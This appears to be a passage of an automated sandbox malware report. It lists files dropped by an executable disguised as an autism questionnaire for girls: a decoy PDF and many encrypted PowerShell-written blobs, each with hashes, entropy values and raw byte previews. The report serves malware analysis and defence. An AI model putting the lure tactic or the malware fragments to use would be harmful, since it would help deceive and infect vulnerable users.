                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PDF document, version 1.4
                                                                                            Category:dropped
                                                                                            Size (bytes):779052
                                                                                            Entropy (8bit):5.4075171599463925
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
                                                                                            MD5:31710A6E10CC4B0F068E4657B2EE5494
                                                                                            SHA1:15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
                                                                                            SHA-256:69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
                                                                                            SHA-512:1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
                                                                                            Malicious:false
                                                                                            Preview: %PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ
                                                                                            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            Process:C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3156992
                                                                                            Entropy (8bit):6.365159560244291
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:REA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVQ33387:192bz2Eb6pd7B6bAGx7q333Q
                                                                                            MD5:8693B9CFB8B4C466AE12CCDC2FEB46CE
                                                                                            SHA1:3AF2687BE88754CC17CB3CAAC57331A467F554BB
                                                                                            SHA-256:AF1E952B5B02CA06497E2050BD1CE8D17B9793FDB791473BDAE5D994056CB21F
                                                                                            SHA-512:997AEC8FA4948C301EC4FC5D50DB5AACE33A1D0F73BB0A75B748F1208BE72616290077D9C78228EDE34917B5D7E85B2CF70402969002BB8C131911C5F1D32C87
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.t.....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc...t.....-.......-.............@..@..............1.......0.............@..@........................................................
                                                                                            C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PDF document, version 1.4
                                                                                            Category:dropped
                                                                                            Size (bytes):779052
                                                                                            Entropy (8bit):5.4075171599463925
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
                                                                                            MD5:31710A6E10CC4B0F068E4657B2EE5494
                                                                                            SHA1:15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
                                                                                            SHA-256:69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
                                                                                            SHA-512:1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
                                                                                            Malicious:false
                                                                                            Preview: %PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\AOiWkhKTEUaSxqPJryR.SPWQXkCAMyTmhGzuqt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186874
                                                                                            Entropy (8bit):7.998991006818741
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:hleGfu0y63FVYQOtahSi6bVjL98Qu1UxDWd635U7Zm/s2X:hAGO63FVYQOkhSi6Zn9pq3D7Zm/s2X
                                                                                            MD5:3A9A0DDB21CF166F1F13186B53EF7ABC
                                                                                            SHA1:D97AE6262669CE00D0A61C8E7FD55466C738A03F
                                                                                            SHA-256:C286307944FEE984B61587353D4D666460932554F7E1F4E830E4742049AD43A8
                                                                                            SHA-512:FC357603F0C42E206FF496CE68FC0857AD7334B3241D04800F23B0B14E9BA0F6017996A5302ED7F7339B2DBBCDE704981B85AB85AFA289E98D460D2691464EE7
                                                                                            Malicious:true
                                                                                            Preview: ..{.C@....?....3..+cQ...q.....u...wK.v?...^9W..>/.../.....X.I.e.=...v}..J..wxZ.w..h.E......Ww..p.2.H....C..EZ...a.a....;...).1^En./W..t;A...J.e.%-.i....:..Y..S.......:G.;....Y..."...;".)..Z.J..6Z...Z./g....FL.\...}......RR..5...........8..i.....z.....2.^..-OG..e....:jq.....U.........#..+.h".......DcdZ.P...Mx.y....|..sE.1.._....'-.i,...Kx..i....J......(KWx{sT.tLo..A...A.gFd.(....gE.Kxl;@..x..X\`.J.Tk@.J.n../.......\0.C.D......O.YN&.......(...LV....(.a<..ng.>L..f..'-.2.*..".i.Y6..&.=O.E.c.J..f.......7....gk\...R(...>.. .:a`XyE.C..0......A.+..$.......m.}.@.."....n."$4<HuF'vzV;D.H.2T..q.ZdT..#..Q.E...Gg'...).\....P.9.....e&.c_....o^\....R.0_.6F-,......S....$.].j..C5.k^.x./..6.vz...._.....s..j...Y......V. ....k...*..v_.~..a..A....P...c.y .d].....x...A.^b..........1.)Q&..?..?.2....m...eT.m.]v!b.T....'.....E#/..)...#..~..e.C...ri.....8.t.. 1...4YIq....l...}.8....xD..w......joHE...yL0.........3.>e.1........~.@H.(.....H.).."..dz0...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ASsgpFIMVt.xMedSYgIBHG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):143239
                                                                                            Entropy (8bit):7.998784497313455
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:CH7i5Y1sZiX1ewEk/wHIvd32nKLS88cn4VCdBXM+0mdWxCECrSj:s7EY1TFewEkooVvSrvVCdBXMbmdeHCy
                                                                                            MD5:8DB35A5A2A8E03C19030ED9DB956B82A
                                                                                            SHA1:A324FA15311CF80A266240B0CE5F4BA279C82B09
                                                                                            SHA-256:FFBA096ACE4703BC6B07BE35DF6F99E942276C3AD5F1CD7782068083958B44E9
                                                                                            SHA-512:C6FE43C2695A576EE489B9E1C4B58C8285EAA5AC784405C2CA9F95AD6AAE3340D936A1DC132DBAF843C8A3EB74631A7207AE3F5D31DE569EA17A9359F0876457
                                                                                            Malicious:true
                                                                                            Preview: t.*G..0......c.K....9....s..=.1......_^p.."..\..Bb.P.:..8Ly/8.W.9..4f.n.n{.....vM.T.?.ZY.oE..7..;U1..O.U&"z..T..b....J..sZK...6|.*Z.....u...^....uM:..\R.{..#CB(..e......U...@B...A!...m#.;p..FX6.'..\`.....A.L.L..Y....\l..j........"\-..u.N.+...$@`.W/.g.<fm+......q.);k.T.yqP@QF.o..")...`....]q..j.:.......W.q..'Y.c..#h......3..2.g..u...&....$..'...R...41.Qg.jO6>%...3...q+.....~.)...9.D.;...a......b..b...V.`...T.]".....R'x.U.*...... S...{....v..wR.......e...|,.w.h........w0..H"....l.i..Z...d5..P.HZ.4...?4..{YT........g.@....K........)....l..c/0..+...}Np,8......[. Zb.....7...Q.c1........V[..MM.....D.zb..,.2/a.'V..^...-.- .J.....k.....(.F..&~q}L.|j..MA.V;.gH.N.}..QW.g..L..($r.N.......t..v..k../..l+.....Kf%.2.....1...?.]y.%C.gf.{."......_N.V...k./.|-N.l%h.j....4..E).h..E"BT."...a...a..`.-....&Z2V.M.RI..2H.. ..."..Gc.s.......l..ft9.......\...8.B..y..:.b[G..V...t.=.G.2."L..G.[..s...kQ.R.*:..[..#y..w..o.t.....+........y........$Q.0...U!..Sk..N.x.?.o...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BSCWZeibkUap.kNyGvUKVWROLg
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):193427
                                                                                            Entropy (8bit):7.99909925708658
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:IIQ0Al38RISsOk0iaKDrexBAawVkWun+KXviSFh+rVRdEoL4xx5FC:I8E3aSOvwrGBAagun+KX6ShIRa9xx5k
                                                                                            MD5:6AFC814E96BA1188C0B712D079C2B4BA
                                                                                            SHA1:BE02AFA80CF836ADECAA7C02F8F6A3298D425ADF
                                                                                            SHA-256:F642A6A62E8641E5ED8C97515C29AEB6E345DD95E6CD3B9F3C2A8471A4AF9F3E
                                                                                            SHA-512:31648857FB6688179A967C50B7AD99A90D42C6336876828A93094299BBE75A20DB8C88E0B440850C1DFA2A33956C9035C6961B7F47E0E3077C69798BB8C91C69
                                                                                            Malicious:true
                                                                                            Preview: 3....u..G[Q.=...".lJ7..u....^uM$......7..9J..v.....$..$..+Z.....#.7u.e..?f...\...V.()...K....F..qR...2..m......E....._Fd~f..5.F...G....#...[.#A........$7S....<.(....-y...BI}..Su#.5.h..{.9..8s..H...1.Ym!.T.^v>=.).3..OR...v..Sn).5...D6|...hv....6.n....3#.UC..A..[....~.0.${..D.C..#n.........b|..)..0....S.g.....Qb....e.g.X....._....z...1......*..T...0!AN.=h....p4.n.....b....H..{....90.......^.c...;=%|..v.lP.?8.....:.=X."..U...uN.>.^;.T.4.....$A.k.x...E.....b%...L.5Y)..2."Q....$.3.P.~...?&K..7....BT...X .w....=u..W:.n2.+i[..e.r...[U.p....ER.F.KB.......hq3-^j.E.\.v......$..t.0#$...4$.i.-V..B.+{Dw.$j...`....9.!..X....x. $.'z...H..f#...f......L&.q...^..|g.q.......$4.+.d...%Fy..R..8t.u).?)..D..GEM...E.f..rV! pkn.z$g..D.o.}B...,..x....._.3..._...!.T..Z6;...x..rc.....mOR.......G.s.x.P..1.......^..w.B...P.w<.g>.......... U.....3..0^.:..cO.S.jI...}@..A!...vz.6.4i.#....../t...-.z....U.c./,K......V.&M.:.~..+..... .A....Z..|[..i-..7O.4
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BrWsxmwzXtq.boMtkvBjOGhViaZIu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):167533
                                                                                            Entropy (8bit):7.998851902202064
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:US9Iv89VeO4ABuEgxZ3zZ93bOBd2BHqR5anEkftQx+Mdtz83j6:V2va8TEg/7A2AR5ADQd83j6
                                                                                            MD5:B2116E5A9772D025678CC8561531133A
                                                                                            SHA1:0340152DC86D5E2794E6F8504C83FD39ECCFE767
                                                                                            SHA-256:83B0BBEE9847812BBE4A1D8600AB6F45DA8681CC3435D038A2C91AF26E977AC6
                                                                                            SHA-512:7F07F645533F8CE81E7800059BE973A6DC94ABECFA0BDE891314B0D147B6141D2B2BE89EBCE15605CFD0DA3EE64F9223F8117EF672A9C5BC3070BE6621068E96
                                                                                            Malicious:true
                                                                                            Preview: m-6...f...@d@.>.D.=...|..t.^.....S....X....-......#....g.E....*.we......u..`.._....6.....{....i.\..Vp...P..I[...N.e..b..i.Ego...7.....D....".2%.MY.IEh1.[7..6...5..M...UO....^6.f.!..f.0N.].r.....c....z./\.....=g.,F. ....[..KLx...j..a.Xk....\.4b.....d.D....1f..lh.]..d^.Z.....L..*..Cbq..M..r..sZ.....M..7..F.t......%=.tZ.....r...'....v....s............?z7!.P.j.?......ZK..Y..<...&...6...Um..(..A...a.F<..\>...#?p..2`.%..q.._{1G......6....e...I{...M....K!A^,v+.....N.l+a.|..q.4...]...H.x.cr};kn..2,....*e6Z.[..H.....T.g2W..9A"A.._a.....A....V.4.....d......$..G@.i..........qF..6m.T.........sWy.>......n..4%...|....l...S-...g<#..`.9..oV..#/........#...y..........e^...u0..T.....7[.[.'..n..g...z..'{.pQgU..$F.sk.v0.H...g.....|b^&.nr|.^..|..(.t=..T.1.Er..`g..... ...Z.E.TP(..lu./q.c.JS._i..Z,N6....@>..^.T.~~....\.}b+........$..w..O.`....7}...P......@C.S..0B...6..k[.^..O...%..TG.......J5...._.d69K.T.).-.8......K..|....Z.........b.R..|1.....9..d8.fh...gi%...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BsXTWhuOSKlUJidkM.OFiACTthuEWcHqNsUM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):130277
                                                                                            Entropy (8bit):7.998575506824406
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:XR0nZQHfVgL6N2PBQwHJKoydrIbfEGo3wWaR6F3MZytJreGScN+jF5:+GdgMMuJ6js3wDsF3mQZ4B5
                                                                                            MD5:CF825DBE962D11615B2D038D00681BF2
                                                                                            SHA1:433892689084BE66CB1AB3B424FA0D194BDE37B3
                                                                                            SHA-256:47DE025CF20651F2D5B626A45E3C6282AF7C55E0937BFCF413FE166DDFA9B570
                                                                                            SHA-512:B8DE6556A73732B7DF3E93697F175A81863FA612E8E5B3BBA5C70A6B38680B3C58F9934E33F59D959BCA940E0FAC9B5B56E0DE80AD2D2B204D72D0EE0692C254
                                                                                            Malicious:true
                                                                                            Preview: ......4.9.!..............x+=.?.......P.oV@.Vi.....[J...q.S?..x..c.9.?.@.F^w...".$..s..H|Ec..f.=.Y?e.....*\J1Q.]T...vT.n.F....kV)k.Q@oz"...2.....V.. .|......1......k...T6.s..G.....O6$..E....Gm.'.........u..&..u....a.K7J.,=" .....RiW.F.1<.&.'..t.%.N.....V..U..3.#[[../.-..t.E"....`...F..@.=N(b...'.......[Q}..........=...[..q}..Y,eA.Q..dr= nV.pQ....a/s...Hh.Q....Jif4....|n.T._x ^..Q.5..3.5W!(..h..........k......i4....{..[E2kU.p5t.SBB...%..El..4..Sl.Gf.M.W...G...~.....}._}.-0.....',...:+.2%O......=...N..)..H.Lz.Q=p.]e..W..._~...B.j2b5W%H.z..{J%]...]..r....~.R.k.\.....cLI{..m:!/13b..%.H...V....:.n.........X.N..".x7..x._.O_...3q.V.H...a.h.b].fk.*..o...k.6d..w.....[f..Wvh.A...*.q.C=.),....p.v....U.Z.k...i..k.......e.^......|.L.x....#.|.s..F.r..o`.......Z..9.^.....>.8..EG..H....^...H@~.9:...........[I..."X..q.......>.Q..2....+..H1.S.....].&$..T.{R.f.=......Z-./)..9t...{apf...h..K..2..........XE...k...L...V..}..FV3..N.K._...oWM. ....R..[.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DkJrpwuAXeOI.hIMvrwnfOGdyLp
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):180709
                                                                                            Entropy (8bit):7.999001165875362
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Ojw+NTgxgBqVFPYhbKvwt+pRyziIFi7fQHDEVGnO/HN+IujHnx1AmNvm8iy/Lo:Ojw+hgxgBsFGQcEkij7EDtnyN+7R9YW0
                                                                                            MD5:B049AE57B871FA85A0014D49EC51A926
                                                                                            SHA1:D50952E683436C03B6C2F6FF6F417FBACDB0AD92
                                                                                            SHA-256:9F9B8A814DC7FC5A1FD124088B60ECAB908A72B9AB9F35C621CE1FF806D05A93
                                                                                            SHA-512:E10B9F43E4F5DAA5A8D3E597994E141D55E0EB4E67B3E7A9BF0858B9F5E361CF0CE27A890BEF1AD133549B50D5532B885CEC70400B2CF0B4D84AC0120EE658E2
                                                                                            Malicious:true
                                                                                            Preview: ...]D..y)4.H...v.....<l.w#V.X..h...uw....It4...-..M.e......{v.C....;.1>9....%...G.q1F....,U...U.m....7a&...A.7.#....^...J...T%.T...-.tJ.uZ#.<...(.K..K.].\>3...[...!x....*....Q..)...L.Z....v..S3V.....L[!...CL.nxKaS>./|{>_.?G....MxR.L*........S*...L...9.....z..$.`.%..(.2...[hB..?.{.E...0i....9.*.].....k..u.~Ao:.........!.rwa=.`....v...}|.}.WL]Q..^......b...v..]{....@.~.g.D..%.......?...wl|i..D.]X.`Ww.rH...f.....A.l@S%...b.<.........v.....d0..55..^..u$.h....;M..3....r5..}J1..9.N.....-...(."H.zQ.c..S.(.+...h3.;.....Fp....p43..^...L .W.5.......{..D.....~..'..,.Pz^J.;....sg.3...F..<|..q[...\.$e........;.......=.p..iO)`..3,...Z,CW/u...6l./.....B.>.^Ze.2..8.$`...l...Q...._.G[l...?.......'3...h.VR.6F.Y..`...H.E..Cg....N..l...L....\/..(u.&.B....\...C.)%...pF~.B.M.$...`!.'x....eb.G8^..3..?.......;fH..l.......,..gW.)......V...q..<....*....h.J...A....bu=.v.|.A?...v...-?cz.n..\x#.>..5S....Ir.BL.g..r..p.v..b..X..}...#..-y...A+T...7..@...@>........
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DpZKQEkjnlPFUbgiSc.RVnKibmNahLBUCAOXP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):134079
                                                                                            Entropy (8bit):7.998508519262818
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:F9j4823Vwyu9YaVMLe4jFHDk8dnZIt9Xv8T31hlx2:nRIwyuzO6uFHDk4ZIcT31hlo
                                                                                            MD5:AA148F739E31E95D2EEEB36C98B46115
                                                                                            SHA1:6BAA994CBE2C5492C3C1533258CE101C20BB0D4F
                                                                                            SHA-256:FB03E5B3B4E2DA4F4307F60C0F9756E637FF4307BBFEEEBBBD85F559B1D68736
                                                                                            SHA-512:DCE09B8C8C7E9E5E09A58E148E65C4039000128EE64FE4A09CC8D31DE3B25CE374555EB1372257B7161139EACB64F072A41C780436C226447BDE5EBD2A2CB889
                                                                                            Malicious:true
                                                                                            Preview: '. .lQ........qp,....."VH........}.....k%... .....a.1....#......{.v.I...i.lc(.V...v>.....`(n.\.......pN.../..H...V.....g!......a..J...w....d......N.Y...e.2."Q..xu..9..;..`.?...cy$..r.'.8.DD..G.....Y.^.HhE.`..5$.,$....dJ...._...... .L.*Y_..X.. .#..l >........G.Ac.....Y..o..bv ..{.....dP....._.K....iTZ.4c.z5...m.x...w....^..../T.h=..o<...I..|C`..!<....M^.m..|J.C.+/.`.@vL}.6.../....^m.]r.C@..|..1.+.k...R.(..c.L<.....^...3....R...M......5X<0O....Kn...h!..m...?I....+..(..|.....w..6yC...GW.lT...A. .7.?.......,W..v...:_.a.Y(.m.b..WPb.9...X1.'d..j.\.Y..i.C;H|1++>.g.sC.<9...-.9.D.i..2.r.O.W..,.v....'....=.;......U.....0>.(.'_&.0zB.n..n..EaS...i.2V......hMM.t...j..-.?$....l....J....94!.obe.P.>;..2h....8.ooV..+.......J8.x..R.....?;...=.@.r.T.z...Bkd.s.*.......D+....*K....J.&.......d..\..k...i.....$..Z#].q.y..>...m4..>l.h....O."._..}..8@..:|a.YR.M.q....+. !.V.....a.`~...S."..L.....7%...;....(...S.-...B.....#5.....c..B..|.4.'..t..Y.%.v(.WC..U
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DteYiQCzsmBdLVXjSo.eZRFsEoJXSwgAf
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123346
                                                                                            Entropy (8bit):7.998269502299577
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:r1s/v5WdPs2jwmE/Ht5c+T/b08rhdJ3p9e2o6vm3+UHVax3y1fUZv58LLhUTGvec:rG/x32jVENfbb0EhX598VZaIFhiubB
                                                                                            MD5:48634A04A5329771DBEE9AD45C6D85CC
                                                                                            SHA1:C02F9FF9ABC314AE9A19A82FF705F7D900A89DE4
                                                                                            SHA-256:7B96F0F7E704D7794F9F13ED5A8D6A3431A086FE536BE8F3279CF077048ECB89
                                                                                            SHA-512:8B1E4D9E565AC427AEDD8EE07D43226AED471EB9CD5DFBD0D63CC803D503B13C87F2BA0C26EC958B8BD251239A5745D9EDF23F334938790F97F3EF50840086E2
                                                                                            Malicious:true
                                                                                            Preview: .FO..l.ke.. .{S.._..2..T*.H......x.]...........HH:...!c...#.QT7F!...(;WH.r.".*.e.....\WEc."tAo..........k.4.@m...<...v8..e.`4.?.m..J......dR(8...........%5.Z...W1..bx.9......s`.H%.:.d....P.X......^...|i$7.....+.c.w. M.`.N.t..D...=.5...,...7....U..7h2...v ....*L.S.K2 FV..Z...`.........=..V.6....,...."..8E.a...@..A...\.j.....$"3oz..v/...4T.K..-?.l.5..k....f.>.TK#~.......l.......Dm..S.[?CO.B>....-:...on....2.......].pp..........~\....P.}.....n]V..~..@...F_..D7...K.....'...U.Ju........{.....cx....1^x..B.Ut....7g.6...e..\....&.c)...N..rF...... ...]z...H.Y.].cNF..(....B$.X^.....m..Y.f..Xn....G.........U7.m@..j.$l..e.a<.PX....A.{..V..>./.E....{....q.]..8^.E`....Y...W..5..#...G4.g|.d.|.~|L.B~..m....*do......u..s.D.Q{f3.fO..{......=.f.}......h.+..p.....{....vY[..V....&..4.O3n2...Et]......#..)...o.I.W}Y..&R.x.~.....p...C.yB\.e...`....%...n3]..q...Z.u.#c9..z.....O.x&.h.|.[....G.U,....6.S*.OB.V5...V....S....>......0..R..}K.T.W..9v....jM.....|..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EIbPfKnJUvZcgtBai.iGKXJZaFmvbpAoVjs
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):141696
                                                                                            Entropy (8bit):7.99876668155372
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:SYzaxh46Rn/T2CSexAkslMNDdM4KCQc/eLFFhAvgXiKEreHCcuYh7n:HW/rR72/fkZBMNc/6AvgXiKErCCctZn
                                                                                            MD5:4CC9748D01730C7681D1D1F0503DC3B7
                                                                                            SHA1:0EE8494EB17F7BED25B9B8E14FE64D5576AFB46B
                                                                                            SHA-256:2730253FB5E2EA500D84D9C9D8A6374A2E8C27DA5A903B0D075618C4223833C7
                                                                                            SHA-512:5E044AB8142804C10B0351116031D95A85A58F52B74D0DF14904057F45E6E35AA414997BF33DD9285AC4A3A65F4D24DCDDEE0876390BA87B66C66C1629C808F2
                                                                                            Malicious:true
                                                                                            Preview: 9.~.Z....}.Pc...g^.k...ox....oH`..%.ptH._..".h......*zUV0I.1h.#..K.....~..^..{....\...[p.?+Z.......6J..(...[t.9.CW.wf6.,....#...[......y.=Tu<..k..I'....aA...G....,F......g.._.,..vK3....V..t.4.t.].p.....S|..u.NM-.:.]..4...w.}..<..G.i..M{G.T.5i'Y.....).....Nr...8./."(~.J.:.....P..vBE....k....I.=.Q:!6x....... ...#....8F....K...*KE.Pba.....1n....%.i.<..A...`F..Y.....%.Ze05.O..J..A8I.CS...48h.-..+0.ddM...~l.{..0. ..|..X.".%....4g...8r..:."....D...I.fe....\..X..5.....~-.!K{4.R?e;..\^....}.&...I....i.8e._"_..^....k/T..^...:..W...>.CK..g.js..ff...,&...&..%m..n.....et...b.UH7...y..YA..%k.A....z.o"ki.>T....B.Q..EZ...M.?...RrJ.9.e.v..S....T(...&d....!)+_...(.u.t2..S5C....@..U.^K..+..D.K....}.C..v.'..gT..f.@}....leo.6..*..y.....7y.w.....2o.^..PM.]..<[R{r..O.!lc/..^...Q..V..Q...XG..:z.Rl.....<....e.f.X.M..^.4n..%."...O]..n.Fd.a.".s...-...(.u......F.6...m......||.E.n,..P.@.]G......].A..J'$..S..:... z.Xv........)....v.......@L.."M.`...Q.B..9i&..!&....|..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EVZRsKUiwlqh.uShGkIVfog
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):139786
                                                                                            Entropy (8bit):7.998711018635881
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:w2l4RT++FVafJU4Moz1nPgBYsHAVxV5+aaQi0eeMFRBadGg:B6RTsnMoz1nQjy73q3FvaUg
                                                                                            MD5:B7B22E3C9DC72DFC4A44A211DFD5CB91
                                                                                            SHA1:41BA5BB281B645CB139052AFC1615655B3588F08
                                                                                            SHA-256:75DFBCC77AF52AE167F8EB131457E160759EC2EBA93E3D985265C464283F9DD7
                                                                                            SHA-512:7C811AC9F35523AB17528A8E358F7FEE84AF5F39337DB704ADBD1B8FE0B59CD549585DD4B1CD97B69E0EA313AF033982732728CBF4B48E24DF0599A781FA1B26
                                                                                            Malicious:true
